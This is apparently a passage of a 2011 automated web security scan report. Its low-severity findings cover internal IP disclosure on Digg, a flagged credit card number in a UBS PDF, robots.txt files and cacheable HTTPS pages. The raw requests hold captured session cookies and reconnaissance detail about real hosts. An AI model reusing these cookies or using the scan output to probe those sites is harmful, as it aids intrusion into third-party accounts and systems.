Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8308

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Search
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, pol
...[SNIP]...
<span title="10.2.129.226 Build: 236 - Thu Jun 23 13:57:54 PDT 2011">
...[SNIP]...

19.6. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=21932 10.2.129.225
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8554

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.129.225 Build: 236 - Thu Jun 23 13:57:54 PDT 2011">
...[SNIP]...

19.7. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /submit?phase=2&url=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&title=presspass+controls+-+Microsoft+Search HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=27224 10.2.129.76
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8985

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.129.76 Build: 236 - Thu Jun 23 13:57:54 PDT 2011">
...[SNIP]...

19.8. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:17:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=33478 10.2.129.81
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8619

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.129.81 Build: 236 - Thu Jun 23 13:57:54 PDT 2011">
...[SNIP]...

19.9. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /submit?phase=2&url=https://www.microsoft.com/presspass/presskits/DCU/default.aspx HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=24761 10.2.128.235
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 8620

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
<span title="10.2.128.235 Build: 236 - Thu Jun 23 13:57:54 PDT 2011">
...[SNIP]...

19.10. http://digg.com/topic

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /topic

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /topic HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=31422 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12469

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology, headlin
...[SNIP]...
<span title="10.2.129.226 Build: 236 - Thu Jun 23 13:57:54 PDT 2011">
...[SNIP]...

19.11. http://digg.com/upcoming

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /upcoming

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=d49aeb50a0490b4b7e1f800682c23d942b50abde233eda6a7b26c684f1cf95d6; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=300792 10.2.129.80
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98962

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- Upcoming News Headlines, Videos and Images
</title>

<meta
...[SNIP]...
<span title="10.2.129.80 Build: 236 - Thu Jun 23 13:57:54 PDT 2011">
...[SNIP]...

20. Credit card numbers disclosed

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.ubs.com
Path:   /staticfiles/olspages/adobe/AdvisoryAndBrokerageServices.pdf

Issue detail

The following credit card number was disclosed in the response:

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /staticfiles/olspages/adobe/AdvisoryAndBrokerageServices.pdf HTTP/1.1
Host: onlineservices.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
accept-ranges: bytes
connection: close
content-length: 956266
content-type: application/pdf
date: Wed, 06 Jul 2011 14:08:14 GMT
etag: "e976a-4bbf4038"
last-modified: Fri, 09 Apr 2010 14:56:56 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"

%PDF-1.4%....
106 0 obj<</Linearized 1/L 956266/O 108/E 562847/N 23/T 954103/H [ 816 1207]>>endobj xref106 260000000016 00000 n
0000002023 00000 n
0000002124 00000 n
0000002530 0
...[SNIP]...
56 556 556 556 556 556 556 0 556 556 278 278 0 0 0 0 0 667 556 0 0 500 444 722 0 222 0 0 0 889 0 722 0 0 0 0 500 0 611 944 0 611 0 0 0 0 0 0 0 500 556 444 556 500 333 556 556 222 0 500 222 833 556 556 556 0 333 389 333 556 444 778 444 444 444 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 278 556 556 0 0 1000 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 800]/BaseFont/TKBRUF+Frutiger45Light/FirstChar 32/ToUnicode 54 0 R/En
...[SNIP]...

21. Robots.txt file
There are 11 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


21.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Wed, 06 Jul 2011 11:55:06 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

21.2. http://api.twitter.com/receiver.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /receiver.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:02:31 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Tue, 05 Jul 2011 19:19:41 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Thu, 07 Jul 2011 14:02:31 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

21.3. http://cdn.stumble-upon.com/css/global_su.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.stumble-upon.com
Path:   /css/global_su.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Content-Type: text/plain; charset=iso-8859-1
Date: Wed, 06 Jul 2011 11:15:25 GMT
Content-Length: 1962
Connection: close

Sitemap: http://stumbleupon.com/sitemap.blogA_index.xml
Sitemap: http://stumbleupon.com/sitemap.blogB_index.xml
Sitemap: http://stumbleupon.com/sitemap.review_index.xml
Sitemap: http://stumbleupon.com
...[SNIP]...

21.4. http://crl.globalsign.net/Root.crl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://crl.globalsign.net
Path:   /Root.crl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: crl.globalsign.net

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (CentOS)
Last-Modified: Fri, 22 Jul 2005 09:01:45 GMT
ETag: "674e8a-1a-50aeb040"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Connection: close
Date: Sun, 03 Jul 2011 14:21:36 GMT
Content-Length: 26

User-agent: *
Disallow: /

21.5. http://digg.com/submit

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: digg.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:16:14 GMT
Server: Apache
Last-Modified: Thu, 23 Jun 2011 20:57:55 GMT
Accept-Ranges: bytes
Content-Length: 599
Vary: Accept-Encoding
X-Digg-Time: D=357 (null)
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Keep-Alive: timeout=5, max=9996
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ad/*
Disallow: /ajax/*
Disallow: /error/*
Disallow: /onboard/*
Disallow: /saved
Disallow: /settings
Disallow: /settings/*
Disallow: /news/*/v/*
Disallow: /verification/*

User
...[SNIP]...

21.6. http://feeds.bbci.co.uk/news/rss.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=3600
Expires: Wed, 06 Jul 2011 12:54:38 GMT
Date: Wed, 06 Jul 2011 11:54:38 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

21.7. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Wed, 06 Jul 2011 11:55:06 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

21.8. https://login.live.com/login.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.live.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 02 Jun 2011 07:31:01 GMT
Accept-Ranges: bytes
ETag: "80a89b5f720cc1:0"
Server: Microsoft-IIS/7.5
PPServer: PPV: 30 H: BAYIDSLGN1E46 V: 0
Date: Wed, 06 Jul 2011 11:16:21 GMT
Connection: close
Content-Length: 27

User-agent: *
Disallow:

21.9. https://manage.softlayer.com/Sales/orderComputingInstance

Summary

Severity:   Information
Confidence:   Certain
Host:   https://manage.softlayer.com
Path:   /Sales/orderComputingInstance

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: manage.softlayer.com

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:14:57 GMT
Server: Apache
Last-Modified: Mon, 07 Jun 2010 19:32:00 GMT
ETag: "841612-13a-ba00ac00"
Accept-Ranges: bytes
Content-Length: 314
Connection: close
Content-Type: text/plain; charset=UTF-8

# Robots.txt file for http://manage.softlayer.com

User-agent: *
Disallow: /Security/
Disallow: /Hardware/
Disallow: /CloudLayer/
Disallow: /Software/
Disallow: /PublicNetwork/
Disallow: /PrivateNetwo
...[SNIP]...

21.10. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:12:05 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=85209961
Expires: Tue, 18 Mar 2014 17:20:38 GMT
Date: Wed, 06 Jul 2011 11:54:37 GMT
Connection: close

User-agent: *
Disallow: /

21.11. http://profile.live.com/badge/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://profile.live.com
Path:   /badge/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: profile.live.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
X-Imf: 74b7df7e-7559-4b4f-9f91-53867620c531
Set-Cookie: E=P:W4lGReUJzog=:sN3j/lWNTnsRNWsCRrbH2SJWjqKerDVbNW6RwFPo2Bw=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: sc_clustbl_142=1ab99405b8e49721; domain=profile.live.com; expires=Fri, 05-Aug-2011 11:16:22 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: BL2XXXXXC630 V: 1 D: 6/27/2011
Date: Wed, 06 Jul 2011 11:16:21 GMT
Connection: close
Content-Length: 44

...User-agent: *
Disallow: /applications/

22. Cacheable HTTPS response
There are 32 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


22.1. https://blog.metricstream.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://blog.metricstream.com
Path:   /

Request

GET / HTTP/1.1
Host: blog.metricstream.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:404-BGD-511&token:_mch-metricstream.com-1309960802844-32266; __utma=216666762.365739093.1309960803.1309960803.1309960803.1; __utmc=216666762; __utmz=216666762.1309960803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=216666762.9.10.1309960803

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:46:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: https://blog.metricstream.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32336

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>MetricStream GRC Blog | Governance, Risk, Compliance and Quality Management</title>

<!-- feeds -->
<link rel="
...[SNIP]...

22.2. https://clientlogin.ibb.ubs.com/AuthSSO/html/clientservices.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://clientlogin.ibb.ubs.com
Path:   /AuthSSO/html/clientservices.html

Request

GET /AuthSSO/html/clientservices.html HTTP/1.1
Host: clientlogin.ibb.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 06 Jul 2011 14:09:18 GMT
Server: Apache
Last-Modified: Sat, 19 Feb 2011 09:39:49 GMT
ETag: "c4a140-ee9-49c9f69680340"
Accept-Ranges: bytes
Content-Length: 3817
P3P: CP="OTI DSP COR BUS CUR OUR"
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...

22.3. https://clientlogin.ibb.ubs.com/AuthSSO/html/request_login.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://clientlogin.ibb.ubs.com
Path:   /AuthSSO/html/request_login.html

Request

GET /AuthSSO/html/request_login.html HTTP/1.1
Host: clientlogin.ibb.ubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 06 Jul 2011 14:09:17 GMT
Server: Apache
Last-Modified: Sat, 19 Feb 2011 09:39:50 GMT
ETag: "c4a114-11b9-49c9f69774580"
Accept-Ranges: bytes
Content-Length: 4537
P3P: CP="OTI DSP COR BUS CUR OUR"
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...

22.4. https://clientlogin.ibb.ubs.com/AuthSSO/html/securityguidelines.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://clientlogin.ibb.ubs.com
Path:   /AuthSSO/html/securityguidelines.html

Request

GET /AuthSSO/html/securityguidelines.html?_URI=aHR0cDovL2NsaWVudHBvcnRhbC5pYmIudWJzLmNvbS9wb3J0YWwvaW5kZXguaHRtP3BhZ2U9aG9tZQ== HTTP/1.1
Host: clientlogin.ibb.ubs.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www-stats=130ffb6627c.8526e520; NavLB_Www=www2.ubs.com; WT_FPC=id=14.96.190.152-2611613264.30161891:lv=1309981879305:ss=1309981804815

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:52:02 GMT
Server: Apache
Last-Modified: Mon, 21 Jun 2010 19:09:22 GMT
ETag: "b47924-2c7c-4898f0ad67c80"
Accept-Ranges: bytes
Content-Length: 11388
P3P: CP="OTI DSP COR BUS CUR OUR"
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...

22.5. https://live.zune.net/xweb/passport/leftCB.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://live.zune.net
Path:   /xweb/passport/leftCB.aspx

Request

GET /xweb/passport/leftCB.aspx HTTP/1.1
Host: live.zune.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 14:09:00 GMT
Last-Modified: Wed, 06 Jul 2011 14:09:00 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
lx-svr: S802
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:08:59 GMT
Connection: close
Content-Length: 5090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta name="ROBOTS" co
...[SNIP]...

22.6. https://login.live.com/pp1100/RDHelper_JS.srf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /pp1100/RDHelper_JS.srf

Request

GET /pp1100/RDHelper_JS.srf?x=11.0.18163.0&lc=1033 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1309951117&rver=5.5.4177.0&wp=LBI&wreply=https:%2F%2Flive.zune.net%2Fxweb%2Flive%2Fpassport%2FsetCookies.ashx%3Frru%3DhttpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&lc=1033&cb=B001033httpZ3AZ2FZ2FsocialZ2EzuneZ2EnetZ2FMOVIESZ2F0Z2F34FA18ECZ2DECDAZ2D4609Z2DBE85Z2DCE80D58C3842Z3FtargetZ3Dweb&id=75046
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlidperf=throughput=2&latency=1884; Sample=17; MWTMsgr=1; MUID=E361C23374E642C998D8ABA7166A75EC; E=P:P/yZGuUJzog=:Kzhdi7iyZGIIP6617hxekA9uY0QbUMz6hwgjPGAdv04=:F; xid=4eaac30d-fa12-4b9e-a769-aec310f3e37a&&BL2xxxxxC664&230; xidseq=1; MSPRequ=lt=1309951118&id=75046&co=1; MSPOK=$uuid-d5697c9c-79ed-4594-abc1-63001d12b87b$uuid-7de451db-9b09-4e35-8f6c-e4631fb77a69; CkTst=G1309951121051

Response

HTTP/1.1 200 OK
Content-Length: 9536
Content-Type: text/html; charset=utf-8
Expires: Mon, 04 Jul 2016 11:20:54 GMT
Server: Microsoft-IIS/7.5
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
PPServer: PPV: 30 H: BAYIDSLGN1E35 V: 0
Date: Wed, 06 Jul 2011 11:20:54 GMT
Connection: close


<!-- ServerInfo: BAYIDSLGN1E35 2011.06.02.00.31.45 Live1 Unknown LocVer:0 -->
var k_fRealmNone=0,k_fRealmAllowWLIDSignIn=1<<0,k_fRealmAllowFedSignIn=1<<1,k_fRealmConflictInactive=1<<2,k_fRealmConfl
...[SNIP]...

22.7. https://manage.softlayer.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://manage.softlayer.com
Path:   /

Request

GET / HTTP/1.1
Host: manage.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:20:43 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...

22.8. https://manage.softlayer.com/Sales/orderComputingInstance

Summary

Severity:   Information
Confidence:   Certain
Host:   https://manage.softlayer.com
Path:   /Sales/orderComputingInstance

Request

GET /Sales/orderComputingInstance HTTP/1.1
Host: manage.softlayer.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1306442258.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __qca=P0-1683070318-1308913155755; _mkto_trk=id:220-ESA-932&token:_mch-softlayer.com-1306437485169-98953; __utma=1.1168266774.1306437626.1306442258.1308913135.3

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:14:55 GMT
Server: Apache
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 18438

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" version="XHTML+RDFa 1.0" xml:lang="en-us">
<head>
...[SNIP]...

22.9. https://manage.softlayer.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://manage.softlayer.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: manage.softlayer.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
